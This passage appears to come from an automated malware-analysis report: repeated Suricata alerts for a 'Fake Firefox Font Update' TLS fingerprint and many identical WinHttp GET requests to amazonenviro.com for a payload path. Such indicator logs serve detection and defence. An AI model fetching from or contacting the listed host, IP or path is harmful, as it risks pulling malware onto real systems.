            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:50111 -> 166.62.27.188:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:50069 -> 166.62.27.188:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:50097 -> 166.62.27.188:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:50123 -> 166.62.27.188:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:50121 -> 166.62.27.188:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:50083 -> 166.62.27.188:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:50081 -> 166.62.27.188:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:50117 -> 166.62.27.188:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:50063 -> 166.62.27.188:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:50109 -> 166.62.27.188:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:50065 -> 166.62.27.188:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:50115 -> 166.62.27.188:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:50079 -> 166.62.27.188:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:50099 -> 166.62.27.188:443
            Source: global trafficHTTP traffic detected: GET /245_Tzzlqsjvkee HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Tzzlqsjvkee HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Tzzlqsjvkee HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Tzzlqsjvkee HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Tzzlqsjvkee HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Tzzlqsjvkee HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Tzzlqsjvkee HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Tzzlqsjvkee HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Tzzlqsjvkee HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Tzzlqsjvkee HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Tzzlqsjvkee HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Tzzlqsjvkee HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Tzzlqsjvkee HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Tzzlqsjvkee HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Tzzlqsjvkee HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Tzzlqsjvkee HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Tzzlqsjvkee HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Tzzlqsjvkee HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Tzzlqsjvkee HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Tzzlqsjvkee HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Tzzlqsjvkee HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Tzzlqsjvkee HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Tzzlqsjvkee HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Tzzlqsjvkee HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Tzzlqsjvkee HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Tzzlqsjvkee HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Tzzlqsjvkee HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Tzzlqsjvkee HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Tzzlqsjvkee HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Tzzlqsjvkee HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Tzzlqsjvkee HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Tzzlqsjvkee HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Tzzlqsjvkee HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Tzzlqsjvkee HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Tzzlqsjvkee HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Tzzlqsjvkee HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Tzzlqsjvkee HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Tzzlqsjvkee HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Tzzlqsjvkee HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Tzzlqsjvkee HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Tzzlqsjvkee HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Tzzlqsjvkee HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Tzzlqsjvkee HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Tzzlqsjvkee HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Tzzlqsjvkee HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Tzzlqsjvkee HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Tzzlqsjvkee HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Tzzlqsjvkee HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Tzzlqsjvkee HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Tzzlqsjvkee HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Tzzlqsjvkee HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Tzzlqsjvkee HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Tzzlqsjvkee HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Tzzlqsjvkee HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Tzzlqsjvkee HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Tzzlqsjvkee HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Tzzlqsjvkee HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Tzzlqsjvkee HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Tzzlqsjvkee HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Tzzlqsjvkee HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Tzzlqsjvkee HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Tzzlqsjvkee HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Tzzlqsjvkee HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Tzzlqsjvkee HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Tzzlqsjvkee HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Tzzlqsjvkee HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Tzzlqsjvkee HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Tzzlqsjvkee HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Tzzlqsjvkee HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Tzzlqsjvkee HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Tzzlqsjvkee HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Tzzlqsjvkee HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Tzzlqsjvkee HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Tzzlqsjvkee HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Tzzlqsjvkee HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Tzzlqsjvkee HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /245_Tzzlqsjvkee HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Tzzlqsjvkee HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Tzzlqsjvkee HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Tzzlqsjvkee HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Tzzlqsjvkee HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Tzzlqsjvkee HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Tzzlqsjvkee HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Tzzlqsjvkee HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Tzzlqsjvkee HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Tzzlqsjvkee HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Tzzlqsjvkee HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Tzzlqsjvkee HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Tzzlqsjvkee HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Tzzlqsjvkee HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Tzzlqsjvkee HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Tzzlqsjvkee HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Tzzlqsjvkee HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Tzzlqsjvkee HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Tzzlqsjvkee HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Tzzlqsjvkee HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Tzzlqsjvkee HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Tzzlqsjvkee HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Tzzlqsjvkee HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Tzzlqsjvkee HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Tzzlqsjvkee HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Tzzlqsjvkee HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Tzzlqsjvkee HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Tzzlqsjvkee HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Tzzlqsjvkee HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Tzzlqsjvkee HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Tzzlqsjvkee HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Tzzlqsjvkee HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Tzzlqsjvkee HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Tzzlqsjvkee HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Tzzlqsjvkee HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Tzzlqsjvkee HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Tzzlqsjvkee HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Tzzlqsjvkee HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Tzzlqsjvkee HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Tzzlqsjvkee HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Tzzlqsjvkee HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Tzzlqsjvkee HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Tzzlqsjvkee HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Tzzlqsjvkee HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Tzzlqsjvkee HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Tzzlqsjvkee HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
